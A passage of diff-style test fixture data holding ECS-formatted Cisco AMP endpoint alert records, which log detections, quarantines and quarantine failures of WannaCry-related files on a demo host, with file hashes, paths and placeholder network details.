"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419303574240494000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Ransom:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419303574240493594", + 
"event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843607426Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419303574240494000", + 
"category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419303574240493595", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843609310Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419303574240494000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419303574240493594", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": 
"2021-09-12T17:31:29.843611171Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419303574240494000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419303569945526290", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": 
"2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843613053Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419303574240494000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + 
"network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419303569945526289", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843615119Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419303574240494000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419303565650558983", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": 
"2021-09-12T17:31:29.843617007Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419303569945526000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, 
+ "detection_id": "6419303565650558982", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "file": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843618896Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 
pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419303569945526000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419303565650558980", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "file": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843620759Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419303569945526000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419303565650558979", + 
"event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "file": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843622635Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": 
"alert", + "action": "Quarantine Failure", + "id": "6419303569945526000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419303565650558978", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "tasksche.exe", + "pid": 2920, + "hash": { + "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "@timestamp": "2021-01-14T19:29:10.000Z", + "file": { + "name": "taskse.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe", + "hash": { + "sha1": "be5d6279874da315e3080b06083757aad9b32c23", + "sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "md5": "8495400f199ac77853c53b5a3f278f3e" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "8495400f199ac77853c53b5a3f278f3e", + "be5d6279874da315e3080b06083757aad9b32c23" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843624521Z", + 
"original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":580000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\",\"sha1\":\"be5d6279874da315e3080b06083757aad9b32c23\",\"md5\":\"8495400f199ac77853c53b5a3f278f3e\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419303569945526000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": 
"W32.2CA2D550E6-100.SBX.VIOC", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419303569945526290", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "tasksche.exe", + "pid": 2920, + "hash": { + "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "@timestamp": "2021-01-14T19:29:10.000Z", + "file": { + "name": "taskdl.exe", + "path": 